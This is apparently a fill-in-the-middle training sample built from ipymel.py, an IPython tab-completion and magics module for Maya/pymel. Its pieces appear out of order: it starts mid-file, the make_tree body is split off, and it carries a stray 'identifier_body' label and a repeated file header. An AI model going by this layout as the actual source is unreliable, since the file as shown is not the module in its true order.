from IPython.ipapi import TryNext
Colors = coloransi.TermColors
ColorScheme = coloransi.ColorScheme
ColorSchemeTable = coloransi.ColorSchemeTable
ip = None
try:
import readline
except ImportError:
import pyreadline as readline
delim = readline.get_completer_delims()
delim = delim.replace('|', '') # remove pipes
delim = delim.replace(':', '') # remove colon
# delim = delim.replace("'", '') # remove quotes
# delim = delim.replace('"', '') # remove quotes
readline.set_completer_delims(delim)
import inspect
import re
import glob
import os
import shlex
import sys
# don't import pymel here, as this will trigger loading of maya/pymel
# immediately, and things in the userSetup.py won't get properly entered into
# the ipython shell's namespace... we need the startup of maya to happen
# from "within" ipython, ie, when we do:
# ip.ex("from pymel.core import *")
# from pymel import core
# we also can't even use maya.cmds, because it doesn't work in anything other
# than the main thread... and most of the tab-completion stuff runs in a
# subthread... so api it is!
# Use api2 because it's faster...
import maya.api.OpenMaya as om
_scheme_default = 'Linux'
# Build a few color schemes
NoColor = ColorScheme(
'NoColor', {
'instance': Colors.NoColor,
'collapsed': Colors.NoColor,
'tree': Colors.NoColor,
'transform': Colors.NoColor,
'shape': Colors.NoColor,
'nonunique': Colors.NoColor,
'nonunique_transform': Colors.NoColor,
'normal': Colors.NoColor # color off (usu. Colors.Normal)
})
LinuxColors = ColorScheme(
'Linux', {
'instance': Colors.LightCyan,
'collapsed': Colors.Yellow,
'tree': Colors.Green,
'transform': Colors.White,
'shape': Colors.LightGray,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
LightBGColors = ColorScheme(
'LightBG', {
'instance': Colors.Cyan,
'collapsed': Colors.LightGreen,
'tree': Colors.Blue,
'transform': Colors.DarkGray,
'shape': Colors.Black,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
# Build table of color schemes (needed by the dag_parser)
color_table = ColorSchemeTable([NoColor, LinuxColors, LightBGColors],
_scheme_default)
color_table['Neutral'] = LightBGColors
def splitDag(obj):
buf = obj.split('|')
tail = buf[-1]
path = '|'.join(buf[:-1])
return path, tail
def expand(obj):
"""
allows for completion of objects that reside within a namespace. for example,
``tra*`` will match ``trak:camera`` and ``tram``
for now, we will hardwire the search to a depth of three recursive namespaces.
TODO:
add some code to determine how deep we should go
"""
return (obj + '*', obj + '*:*', obj + '*:*:*')
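# Illustrative sketch (added for clarity, not part of the original module):
# expand() just builds wildcard patterns for up to three namespace levels,
# which api_ls()/MSelectionList below then resolve. The scene contents used
# here are assumptions.
#
#     >>> expand('tra')
#     ('tra*', 'tra*:*', 'tra*:*:*')
#     >>> api_ls(expand('tra'), dagOnly=False)    # hypothetical scene
#     ['tram', 'trak:camera']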
def api_ls(args, dagOnly, long=False):
'''Because the tab completer runs in a subthread, and cmds.ls doesn't
seem to work very well from a subthread, use maya.api.OpenMaya'''
sel = om.MSelectionList()
if isinstance(args, basestring):
args = [args]
for arg in args:
# if it doesn't exist, MSelectionList.add will raise an error -
# ignore that
try:
sel.add(arg)
except Exception:
pass
if not long and not dagOnly:
return list(sel.getSelectionStrings())
# long is only used when getting nodes, not plugs, so ignore that case
# for now...
results = []
mfnDep = om.MFnDependencyNode()
for i in range(sel.length()):
try:
dagPath = sel.getDagPath(i)
except TypeError:
if dagOnly:
continue
mobj = sel.getDependNode(i)
mfnDep.setObject(mobj)
results.append(mfnDep.name())
else:
if long:
results.append(dagPath.fullPathName())
else:
results.append(dagPath.partialPathName())
return results
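# A minimal usage sketch (illustration only; node names are assumptions):
# api_ls mirrors a tiny subset of cmds.ls via the API so it is safe to call
# from the completer's subthread.
#
#     >>> api_ls('persp', dagOnly=True)               # partial DAG path
#     ['persp']
#     >>> api_ls('persp', dagOnly=True, long=True)    # full DAG path
#     ['|persp']
#     >>> api_ls('time1', dagOnly=True)               # non-DAG nodes are skipped
#     []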
def api_children(path):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
dagPath = sel.getDagPath(0)
except TypeError:
return []
return [om.MFnDagNode(dagPath.child(i)).fullPathName()
for i in range(dagPath.childCount())]
def api_listAttr(path, shortNames=False):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
plug = sel.getPlug(0)
except TypeError:
try:
node = om.MFnDependencyNode(sel.getDependNode(0))
except RuntimeWarning:
return []
attrs = [om.MFnAttribute(node.attribute(i))
for i in range(node.attributeCount())]
if shortNames:
return [x.shortName for x in attrs]
else:
return [x.name for x in attrs]
else:
return [plug.child(i).partialName(useLongNames=not shortNames)
for i in range(plug.numChildren())]
def complete_node_with_attr(node, attr):
# print "noe_with_attr", node, attr
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
return [u'%s.%s' % (node, a) for a in attrs if a.startswith(attr)]
def pymel_dag_completer(self, event):
return pymel_name_completer(self, event, dagOnly=True)
def pymel_name_completer(self, event, dagOnly=False):
def get_children(obj, dagOnly):
path, partialObj = splitDag(obj)
# print "getting children", repr(path), repr(partialObj)
# try:
if True:
fullpaths = api_ls(path, dagOnly, long=True)
if not fullpaths or not fullpaths[0]:
return []
fullpath = fullpaths[0]
children = api_children(fullpath)
if not children:
return []
# except Exception:
# return []
matchStr = fullpath + '|' + partialObj
matches = [x.replace(fullpath, path, 1) for x in children if x.startswith(matchStr)]
return matches
# print "\nnode", repr(event.symbol), repr(event.line)
# print "\nbegin"
# note that the NAME_COMPLETER_RE also works for DAG_MAGIC_COMPLETER_RE
# and DAG_COMPLETER_RE, since those are simply more restrictive versions,
# which set "dagOnly"
# print "text_until_cursor: {}".format(event.text_until_cursor)
# print "symbol: {}".format(event.symbol)
linematch = NAME_COMPLETER_RE.match(event.text_until_cursor)
# print "linematch: {}".format(linematch.group(0))
nametext = linematch.group('namematch')
# print "nametext: {}".format(nametext)
matches = None
#--------------
# Attributes
#--------------
if not dagOnly:
attr_match = ATTR_RE.match(nametext)
else:
attr_match = None
if attr_match:
node, attr = attr_match.groups()
if node == 'SCENE':
res = api_ls(attr + '*', dagOnly)
if res:
matches = ['SCENE.' + x for x in res if '|' not in x]
elif node.startswith('SCENE.'):
node = node.replace('SCENE.', '')
matches = ['SCENE.' + x for x in complete_node_with_attr(node, attr) if '|' not in x]
else:
matches = complete_node_with_attr(node, attr)
#--------------
# Nodes
#--------------
else:
# we don't yet have a full node
if '|' not in nametext or (nametext.startswith('|') and nametext.count('|') == 1):
# print "partial node"
kwargs = {}
if nametext.startswith('|'):
kwargs['long'] = True
matches = api_ls(expand(nametext), dagOnly, **kwargs)
        # we have a full node, get its children
else:
matches = get_children(nametext, dagOnly)
if not matches:
raise TryNext
# if we have only one match, get the children as well
if len(matches) == 1 and not attr_match:
res = get_children(matches[0] + '|', dagOnly)
matches += res
if event.symbol != nametext:
# in some situations, the event.symbol will only have incomplete
# information - ie, if we are completing "persp|p", then the symbol will
# be "p" - nametext will give us the full "persp|p", which we need so we
# know we're checking for children of "persp". In these situations, we
# need to STRIP the leading non-symbol portion, so we don't end up with
# "persp|persp|perspShape" after completion.
if nametext.endswith(event.symbol):
if not event.symbol:
preSymbol = nametext
else:
preSymbol = nametext[:-len(event.symbol)]
matches = [x[len(preSymbol):] if x.startswith(preSymbol) else x
for x in matches]
# HOWEVER - in other situations, the symbol will contain too much
# information - ie, stuff that isn't strictly speaking a node name - such
# as when we complete "SCENE.p". In this case, the symbol is "SCENE.p",
# whereas nametext is simply "p". In such cases, we need to PREPEND the
# extra "SCENE." to the result, or else ipython will think our matches
# are not actually matches...
elif event.symbol.endswith(nametext):
if not nametext:
symbolPrefix = event.symbol
else:
symbolPrefix = event.symbol[:-len(nametext)]
matches = [symbolPrefix + x for x in matches]
return matches
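# Worked example of the strip/prepend handling above (illustrative, with
# hypothetical scene contents):
# - completing "persp|p": event.symbol is "p" while nametext is "persp|p";
#   nametext ends with the symbol, so the leading "persp|" is stripped from
#   each match and readline completes to "persp|perspShape" instead of
#   "persp|persp|perspShape".
# - completing "SCENE.p": event.symbol is "SCENE.p" while nametext is "p";
#   the symbol ends with nametext, so "SCENE." is prepended to each match,
#   e.g. ["SCENE.persp", "SCENE.perspShape"], so ipython accepts them.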
PYTHON_TOKEN_RE = re.compile(r"(\S+(\.\w+)*)\.(\w*)$")
def pymel_python_completer(self, event):
"""Match attributes or global python names"""
import pymel.core as pm
# print "python_matches"
text = event.symbol
# print repr(text)
# Another option, seems to work great. Catches things like ''.<tab>
m = PYTHON_TOKEN_RE.match(text)
if not m:
raise TryNext
expr, attr = m.group(1, 3)
# print type(self.Completer), dir(self.Completer)
# print self.Completer.namespace
# print self.Completer.global_namespace
try:
# print "first"
obj = eval(expr, self.Completer.namespace)
except Exception:
try:
# print "second"
obj = eval(expr, self.Completer.global_namespace)
except Exception:
raise TryNext
# print "complete"
if isinstance(obj, (pm.nt.DependNode, pm.Attribute)):
# print "isinstance"
node = str(obj)
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
matches = []
matches = self.Completer.python_matches(text)
# print "here"
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
# print "returning"
matches += [expr + '.' + at for at in attrs]
#import colorize
#matches = [ colorize.colorize(x,'magenta') for x in matches ]
return matches
raise TryNext
def buildRecentFileMenu():
import pymel.core as pm
if "RecentFilesList" not in pm.optionVar:
return
# get the list
RecentFilesList = pm.optionVar["RecentFilesList"]
nNumItems = len(RecentFilesList)
RecentFilesMaxSize = pm.optionVar["RecentFilesMaxSize"]
# # check if there are too many items in the list
# if (RecentFilesMaxSize < nNumItems):
#
# #if so, truncate the list
# nNumItemsToBeRemoved = nNumItems - RecentFilesMaxSize
#
# #Begin removing items from the head of the array (least recent file in the list)
# for ($i = 0; $i < $nNumItemsToBeRemoved; $i++):
#
# core.optionVar -removeFromArray "RecentFilesList" 0;
#
# RecentFilesList = core.optionVar["RecentFilesList"]
# nNumItems = len($RecentFilesList);
# The RecentFilesTypeList optionVar may not exist since it was
# added after the RecentFilesList optionVar. If it doesn't exist,
# we create it and initialize it with a guess at the file type
if nNumItems > 0:
if "RecentFilesTypeList" not in pm.optionVar:
pm.mel.initRecentFilesTypeList(RecentFilesList)
RecentFilesTypeList = pm.optionVar["RecentFilesTypeList"]
# toNativePath
# first, check if we are the same.
def open_completer(self, event):
relpath = event.symbol
# print event # dbg
if '-b' in event.line:
# return only bookmark completions
bkms = self.db.get('bookmarks', {})
return list(bkms.keys())
if event.symbol == '-':
width_dh = str(len(str(len(ip.user_ns['_sh']) + 1)))
# jump in directory history by number
fmt = '-%0' + width_dh + 'd [%s]'
ents = [fmt % (i, s) for i, s in enumerate(ip.user_ns['_sh'])]
if len(ents) > 1:
return ents
return []
raise TryNext
class TreePager(object):
def __init__(self, colors, options):
self.colors = colors
self.options = options
# print options.depth
def do_level(self, obj, depth, isLast):
if isLast[-1]:
sep = '`-- '
else:
sep = '|-- '
#sep = '|__ '
depth += 1
branch = ''
for x in isLast[:-1]:
if x:
branch += ' '
else:
branch += '| '
branch = self.colors['tree'] + branch + sep + self.colors['normal']
children = self.getChildren(obj)
name = self.getName(obj)
num = len(children) - 1
if children:
if self.options.maxdepth and depth >= self.options.maxdepth:
state = '+'
else:
state = '-'
pre = self.colors['collapsed'] + state + ' '
else:
pre = ' '
yield pre + branch + name + self.colors['normal'] + '\n'
# yield Colors.Yellow + branch + sep + Colors.Normal+ name + '\n'
if not self.options.maxdepth or depth < self.options.maxdepth:
for i, x in enumerate(children):
for line in self.do_level(x, depth, isLast + [i == num]):
yield line
def make_tree(self, roots):
|
class DagTree(TreePager):
def getChildren(self, obj):
if self.options.shapes:
return obj.getChildren()
else:
return obj.getChildren(type='transform')
def getName(self, obj):
import pymel.core as pm
name = obj.nodeName()
if obj.isInstanced():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
id = obj.instanceNumber()
if id != 0:
source = ' -> %s' % obj.getOtherInstances()[0]
else:
source = ''
name = color + name + self.colors['instance'] + ' [' + str(id) + ']' + source
elif not obj.isUniquelyNamed():
if isinstance(obj, pm.nt.Transform):
# keep transforms bolded
color = self.colors['nonunique_transform']
else:
color = self.colors['nonunique']
name = color + name
elif isinstance(obj, pm.nt.Transform):
# bold
name = self.colors['transform'] + name
else:
name = self.colors['shape'] + name
return name
# formerly: magic_dag
dag_parser = OptionParser()
dag_parser.add_option("-d", type="int", dest="maxdepth")
dag_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dag_parser.add_option("-s", action="store_true", dest="shapes")
def dag(self, parameter_s=''):
import pymel.core as pm
options, args = dag_parser.parse_args(parameter_s.split())
colors = get_colors(self)
dagtree = DagTree(colors, options)
if args:
roots = [pm.PyNode(args[0])]
else:
roots = pm.ls(assemblies=1)
page(dagtree.make_tree(roots))
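# Example invocations of the %dag magic (illustrative; the node names are
# assumptions about the current scene):
#
#     %dag                  # tree of every assembly (top-level DAG node)
#     %dag -d 2             # limit the tree to two levels
#     %dag -t persp         # transforms only, rooted at 'persp'
#     %dag -s group1        # include shape nodes (the default), rooted at 'group1'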
class DGHistoryTree(TreePager):
def getChildren(self, obj):
source, dest = obj
return source.node().listConnections(plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
def getName(self, obj):
source, dest = obj
name = "%s -> %s" % (source, dest)
return name
def make_tree(self, root):
import pymel.core as pm
roots = pm.listConnections(root, plugs=True, connections=True, source=True, destination=False, sourceFirst=True)
return TreePager.make_tree(self, roots)
# formerly: magic_dghist
dg_parser = OptionParser()
dg_parser.add_option("-d", type="int", dest="maxdepth")
dg_parser.add_option("-t", action="store_false", dest="shapes", default=True)
dg_parser.add_option("-s", action="store_true", dest="shapes")
def dghist(self, parameter_s=''):
"""
"""
import pymel.core as pm
options, args = dg_parser.parse_args(parameter_s.split())
if not args:
print("must pass in nodes to display the history of")
return
colors = get_colors(self)
dgtree = DGHistoryTree(colors, options)
roots = [pm.PyNode(args[0])]
page(dgtree.make_tree(roots))
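# Example invocation (illustrative; 'myMesh' is an assumed node name):
#
#     %dghist myMesh        # upstream connection tree of myMesh
#     %dghist -d 3 myMesh   # stop after three levels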
# formerly: magic_open
def openf(self, parameter_s=''):
"""Change the current working directory.
This command automatically maintains an internal list of directories
you visit during your IPython session, in the variable _sh. The
command %dhist shows this history nicely formatted. You can also
do 'cd -<tab>' to see directory history conveniently.
Usage:
openFile 'dir': changes to directory 'dir'.
openFile -: changes to the last visited directory.
openFile -<n>: changes to the n-th directory in the directory history.
openFile --foo: change to directory that matches 'foo' in history
openFile -b <bookmark_name>: jump to a bookmark set by %bookmark
(note: cd <bookmark_name> is enough if there is no
directory <bookmark_name>, but a bookmark with the name exists.)
'cd -b <tab>' allows you to tab-complete bookmark names.
Options:
-q: quiet. Do not print the working directory after the cd command is
executed. By default IPython's cd command does print this directory,
since the default prompts do not display path information.
Note that !cd doesn't work for this purpose because the shell where
!command runs is immediately discarded after executing 'command'."""
parameter_s = parameter_s.strip()
#bkms = self.shell.persist.get("bookmarks",{})
oldcwd = os.getcwd()
numcd = re.match(r'(-)(\d+)$', parameter_s)
# jump in directory history by number
if numcd:
nn = int(numcd.group(2))
try:
ps = ip.ev('_sh[%d]' % nn)
except IndexError:
print('The requested directory does not exist in history.')
return
else:
opts = {}
# elif parameter_s.startswith('--'):
# ps = None
# fallback = None
# pat = parameter_s[2:]
# dh = self.shell.user_ns['_sh']
# # first search only by basename (last component)
# for ent in reversed(dh):
# if pat in os.path.basename(ent) and os.path.isdir(ent):
# ps = ent
# break
#
# if fallback is None and pat in ent and os.path.isdir(ent):
# fallback = ent
#
# # if we have no last part match, pick the first full path match
# if ps is None:
# ps = fallback
#
# if ps is None:
# print "No matching entry in directory history"
# return
# else:
# opts = {}
else:
# turn all non-space-escaping backslashes to slashes,
# for c:\windows\directory\names\
parameter_s = re.sub(r'\\(?! )', '/', parameter_s)
opts, ps = self.parse_options(parameter_s, 'qb', mode='string')
# jump to previous
if ps == '-':
try:
            ps = ip.ev('_sh[-2]')
except IndexError:
raise UsageError('%cd -: No previous directory to change to.')
# # jump to bookmark if needed
# else:
# if not os.path.exists(ps) or opts.has_key('b'):
# bkms = self.db.get('bookmarks', {})
#
# if bkms.has_key(ps):
# target = bkms[ps]
# print '(bookmark:%s) -> %s' % (ps,target)
# ps = target
# else:
# if opts.has_key('b'):
# raise UsageError("Bookmark '%s' not found. "
# "Use '%%bookmark -l' to see your bookmarks." % ps)
# at this point ps should point to the target dir
if ps:
ip.ex('openFile("%s", f=1)' % ps)
# try:
# os.chdir(os.path.expanduser(ps))
# if self.shell.rc.term_title:
# #print 'set term title:',self.shell.rc.term_title # dbg
# platutils.set_term_title('IPy ' + abbrev_cwd())
# except OSError:
# print sys.exc_info()[1]
# else:
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# else:
# os.chdir(self.shell.home_dir)
# if self.shell.rc.term_title:
# platutils.set_term_title("IPy ~")
# cwd = os.getcwd()
# dhist = self.shell.user_ns['_sh']
#
# if oldcwd != cwd:
# dhist.append(cwd)
# self.db['dhist'] = compress_dhist(dhist)[-100:]
# if not 'q' in opts and self.shell.user_ns['_sh']:
# print self.shell.user_ns['_sh'][-1]
# maya sets a sigint / ctrl-c / KeyboardInterrupt handler that quits maya -
# want to override this to get "normal" python interpreter behavior, where it
# interrupts the current python command, but doesn't exit the interpreter
def ipymel_sigint_handler(signal, frame):
raise KeyboardInterrupt
def install_sigint_handler(force=False):
import signal
if force or signal.getsignal(signal.SIGINT) == ipymel_sigint_handler:
signal.signal(signal.SIGINT, ipymel_sigint_handler)
# unfortunately, it seems maya overrides the SIGINT hook whenever a plugin is
# loaded...
def sigint_plugin_loaded_callback(*args):
# from the docs, as of 2015 the args are:
# ( [ pathToPlugin, pluginName ], clientData )
install_sigint_handler()
sigint_plugin_loaded_callback_id = None
DAG_MAGIC_COMPLETER_RE = re.compile(r"(?P<preamble>%dag\s+)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)*)(?P<current_part>[a-zA-Z0-9:_]*))$")
DAG_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_]*\|)+)(?P<current_part>[a-zA-Z0-9:_]*))$")
NAME_COMPLETER_RE = re.compile(r"(?P<preamble>((.+(\s+|\())|(SCENE\.))[^\w|:._]*)(?P<namematch>(?P<previous_parts>([a-zA-Z0-9:_.]*(\.|\|))*)(?P<current_part>[a-zA-Z0-9:_]*))$")
ATTR_RE = re.compile(r"""(?P<prefix>[a-zA-Z_0-9|:.]+)\.(?P<partial_attr>\w*)$""")
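# Rough sketch of what these patterns capture (added for illustration; the
# sample inputs are assumptions):
#
#     >>> NAME_COMPLETER_RE.match('ls("persp|p').group('namematch')
#     'persp|p'
#     >>> DAG_MAGIC_COMPLETER_RE.match('%dag persp|p').group('namematch')
#     'persp|p'
#     >>> ATTR_RE.match('persp.tx').groups()
#     ('persp', 'tx')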
def setup(shell):
global ip
if hasattr(shell, 'get_ipython'):
ip = shell.get_ipython()
else:
ip = get_ipython()
ip.set_hook('complete_command', pymel_python_completer, re_key="(?!{})".format(NAME_COMPLETER_RE.pattern))
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_MAGIC_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_dag_completer, re_key=DAG_COMPLETER_RE.pattern)
ip.set_hook('complete_command', pymel_name_completer, re_key=NAME_COMPLETER_RE.pattern)
ip.set_hook('complete_command', open_completer, str_key="openf")
ip.ex("from pymel.core import *")
# stuff in __main__ is not necessarily in ipython's 'main' namespace... so
# if the user has something in userSetup.py that he wants put in the
# "interactive" namespace, it won't be - unless we do this:
ip.ex('from __main__ import *')
# if you don't want pymel imported into the main namespace, you can replace the above with something like:
#ip.ex("import pymel as pm")
define_magic(ip, openf)
define_magic(ip, dag)
define_magic(ip, dghist)
# add projects
ip.ex("""
import os.path
for _mayaproj in optionVar.get('RecentProjectsList', []):
_mayaproj = os.path.join( _mayaproj, 'scenes' )
if _mayaproj not in _dh:
_dh.append(_mayaproj)""")
# add files
ip.ex("""
import os.path
_sh=[]
for _mayaproj in optionVar.get('RecentFilesList', []):
if _mayaproj not in _sh:
_sh.append(_mayaproj)""")
# setup a handler for ctrl-c / SIGINT / KeyboardInterrupt, so maya / ipymel
# doesn't quit
install_sigint_handler(force=True)
# unfortunately, when Mental Ray loads, it installs a new SIGINT handler
# which restores the old "bad" behavior... need to install a plugin callback
# to restore ours...
global sigint_plugin_loaded_callback_id
import pymel.core as pm
if sigint_plugin_loaded_callback_id is None:
sigint_plugin_loaded_callback_id = pm.api.MSceneMessage.addStringArrayCallback(
pm.api.MSceneMessage.kAfterPluginLoad,
sigint_plugin_loaded_callback)
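# Hypothetical wiring for a recent IPython (an assumption, shown only as a
# sketch): instead of the ipy_user_conf.py line from the module docstring,
# setup() can be called from a profile startup file such as
# ~/.ipython/profile_default/startup/50-ipymel.py:
#
#     import ipymel
#     from IPython import get_ipython
#     ipymel.setup(get_ipython())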
def main():
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver >= [1, 0]:
import IPython.terminal.ipapp
app = IPython.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
elif ipy_ver >= [0, 11]:
import IPython.frontend.terminal.ipapp
app = IPython.frontend.terminal.ipapp.TerminalIPythonApp.instance()
app.initialize()
setup(app.shell)
app.start()
else:
import IPython.Shell
shell = IPython.Shell.start()
setup(shell)
shell.mainloop()
if __name__ == '__main__':
main()
| num = len(roots) - 1
tree = ''
for i, x in enumerate(roots):
for line in self.do_level(x, 0, [i == num]):
tree += line
return tree | identifier_body |
ipymel.py | """
pymel ipython configuration
Current Features
----------------
tab completion of depend nodes, dag nodes, and attributes
automatic import of pymel
Future Features
---------------
- tab completion of PyNode attributes
- color coding of tab complete options
- to differentiate between methods and attributes
- dag nodes vs depend nodes
- shortNames vs longNames
- magic commands
- bookmarking of maya's recent project and files
To Use
------
place in your PYTHONPATH
add the following line to the 'main' function of $HOME/.ipython/ipy_user_conf.py::
import ipymel
Author: Chad Dombrova
"""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import range
from past.builtins import basestring
from builtins import object
from optparse import OptionParser
try:
import maya
except ImportError as e:
print("ipymel can only be setup if the maya package can be imported")
raise e
import IPython
ipy_ver = IPython.__version__.split('.')
ipy_ver = [int(x) if x.isdigit() else x for x in ipy_ver]
if ipy_ver < [0, 11]:
def get_ipython():
import IPython.ipapi
return IPython.ipapi.get()
IPython.ipapi.IPApi.define_magic = IPython.ipapi.IPApi.expose_magic
import IPython.ColorANSI as coloransi
from IPython.genutils import page
from IPython.ipapi import UsageError
import IPython.Extensions.ipy_completers
def get_colors(obj):
return color_table[obj.rc.colors].colors
else: # >= [0, 11]
import IPython.utils.coloransi as coloransi
from IPython.core.page import page
from IPython.core.error import UsageError
def get_colors(obj):
return color_table[ip.colors].colors
if ipy_ver >= [0, 13]:
def define_magic(interpreter, function):
def get_ipython():
return interpreter
from IPython.core.magic import register_line_magic
register_line_magic(function)
else:
def define_magic(interpreter, function):
interpreter.define_magic(function.__name__, function)
try:
from IPython.core.error import TryNext
except ImportError:
from IPython.ipapi import TryNext
Colors = coloransi.TermColors
ColorScheme = coloransi.ColorScheme
ColorSchemeTable = coloransi.ColorSchemeTable
ip = None
try:
import readline
except ImportError:
import pyreadline as readline
delim = readline.get_completer_delims()
delim = delim.replace('|', '') # remove pipes
delim = delim.replace(':', '') # remove colon
# delim = delim.replace("'", '') # remove quotes
# delim = delim.replace('"', '') # remove quotes
readline.set_completer_delims(delim)
import inspect
import re
import glob
import os
import shlex
import sys
# don't import pymel here, as this will trigger loading of maya/pymel
# immediately, and things in the userSetup.py won't get properly entered into
# the ipython shell's namespace... we need the startup of maya to happen
# from "within" ipython, ie, when we do:
# ip.ex("from pymel.core import *")
# from pymel import core
# we also can't even use maya.cmds, because it doesn't work in anything other
# than the main thread... and most of the tab-completion stuff runs in a
# subthread... so api it is!
# Use api2 because it's faster...
import maya.api.OpenMaya as om
_scheme_default = 'Linux'
# Build a few color schemes
NoColor = ColorScheme(
'NoColor', {
'instance': Colors.NoColor,
'collapsed': Colors.NoColor,
'tree': Colors.NoColor,
'transform': Colors.NoColor,
'shape': Colors.NoColor,
'nonunique': Colors.NoColor,
'nonunique_transform': Colors.NoColor,
'normal': Colors.NoColor # color off (usu. Colors.Normal)
})
LinuxColors = ColorScheme(
'Linux', {
'instance': Colors.LightCyan,
'collapsed': Colors.Yellow,
'tree': Colors.Green,
'transform': Colors.White,
'shape': Colors.LightGray,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
LightBGColors = ColorScheme(
'LightBG', {
'instance': Colors.Cyan,
'collapsed': Colors.LightGreen,
'tree': Colors.Blue,
'transform': Colors.DarkGray,
'shape': Colors.Black,
'nonunique': Colors.Red,
'nonunique_transform': Colors.LightRed,
'normal': Colors.Normal # color off (usu. Colors.Normal)
})
# Build table of color schemes (needed by the dag_parser)
color_table = ColorSchemeTable([NoColor, LinuxColors, LightBGColors],
_scheme_default)
color_table['Neutral'] = LightBGColors
def splitDag(obj):
buf = obj.split('|')
tail = buf[-1]
path = '|'.join(buf[:-1])
return path, tail
def expand(obj):
"""
allows for completion of objects that reside within a namespace. for example,
``tra*`` will match ``trak:camera`` and ``tram``
for now, we will hardwire the search to a depth of three recursive namespaces.
TODO:
add some code to determine how deep we should go
"""
return (obj + '*', obj + '*:*', obj + '*:*:*')
def api_ls(args, dagOnly, long=False):
'''Because the tab completer runs in a subthread, and cmds.ls doesn't
seem to work very well from a subthread, use maya.api.OpenMaya'''
sel = om.MSelectionList()
if isinstance(args, basestring):
args = [args]
for arg in args:
# if it doesn't exist, MSelectionList.add will raise an error -
# ignore that
try:
sel.add(arg)
except Exception:
pass
if not long and not dagOnly:
return list(sel.getSelectionStrings())
# long is only used when getting nodes, not plugs, so ignore that case
# for now...
results = []
mfnDep = om.MFnDependencyNode()
for i in range(sel.length()):
try:
dagPath = sel.getDagPath(i)
except TypeError:
if dagOnly:
continue
mobj = sel.getDependNode(i)
mfnDep.setObject(mobj)
results.append(mfnDep.name())
else:
if long:
results.append(dagPath.fullPathName())
else:
results.append(dagPath.partialPathName())
return results
def api_children(path):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
dagPath = sel.getDagPath(0)
except TypeError:
return []
return [om.MFnDagNode(dagPath.child(i)).fullPathName()
for i in range(dagPath.childCount())]
def api_listAttr(path, shortNames=False):
sel = om.MSelectionList()
try:
sel.add(path)
except RuntimeError:
return []
if not sel.length():
return []
try:
plug = sel.getPlug(0)
except TypeError:
try:
node = om.MFnDependencyNode(sel.getDependNode(0))
except RuntimeWarning:
return []
attrs = [om.MFnAttribute(node.attribute(i))
for i in range(node.attributeCount())]
if shortNames:
return [x.shortName for x in attrs]
else:
return [x.name for x in attrs]
else:
return [plug.child(i).partialName(useLongNames=not shortNames)
for i in range(plug.numChildren())]
def complete_node_with_attr(node, attr):
# print "noe_with_attr", node, attr
long_attrs = api_listAttr(node)
short_attrs = api_listAttr(node, shortNames=1)
# if node is a plug ( 'persp.t' ), the first result will be the passed plug
if '.' in node:
attrs = long_attrs[1:] + short_attrs[1:]
else:
attrs = long_attrs + short_attrs
return [u'%s.%s' % (node, a) for a in attrs if a.startswith(attr)]
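# Illustrative call (the node and its attribute list are assumptions; output
# abbreviated):
#
#     >>> complete_node_with_attr('persp', 'tran')
#     [u'persp.translate', u'persp.translateX', u'persp.translateY', ...]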
def pymel_dag_completer(self, event):
return pymel_name_completer(self, event, dagOnly=True)
def pymel_name_completer(self, event, dagOnly=False):
def get_children(obj, dagOnly):
path, partialObj = splitDag(obj)
# print "getting children", repr(path), repr(partialObj)
# try:
if True:
fullpaths = api_ls(path, dagOnly, long=True)
if not fullpaths or not fullpaths[0]:
return []
fullpath = fullpaths[0]
children = api_children(fullpath)
if not children:
return []
# except Exception:
# return []
matchStr = fullpath + '|' + partialObj
matches = [x.replace(fullpath, path, 1) for x in children if x.startswith(matchStr)]
return matches
# print "\nnode", repr(event.symbol), repr(event.line)
# print "\nbegin"
# note that the NAME_COMPLETER_RE also works for DAG_MAGIC_COMPLETER_RE
# and DAG_COMPLETER_RE, since those are simply more restrictive versions,
# which set "dagOnly"
# print "text_until_cursor: {}".format(event.text_until_cursor)
# print "symbol: {}".format(event.symbol)
linematch = NAME_COMPLETER_RE.match(event.text_until_cursor)
# print "linematch: {}".format(linematch.group(0))
nametext = linematch.group('namematch')
# print "nametext: {}".format(nametext)
matches = None
#--------------
# Attributes
#--------------
if not dagOnly:
attr_match = ATTR_RE.match(nametext)
else:
attr_match = None
if attr_match:
node, attr = attr_match.groups()
if node == 'SCENE':
res = api_ls(attr + '*', dagOnly)
if res:
matches = ['SCENE.' + x for x in res if '|' not in x]
elif node.startswith('SCENE.'):
node = node.replace('SCENE.', '')
matches = ['SCENE.' + x for x in complete_node_with_attr(node, attr) if '|' not in x]
else:
matches = complete_node_with_attr(node, attr)
#--------------
# Nodes
#--------------
else:
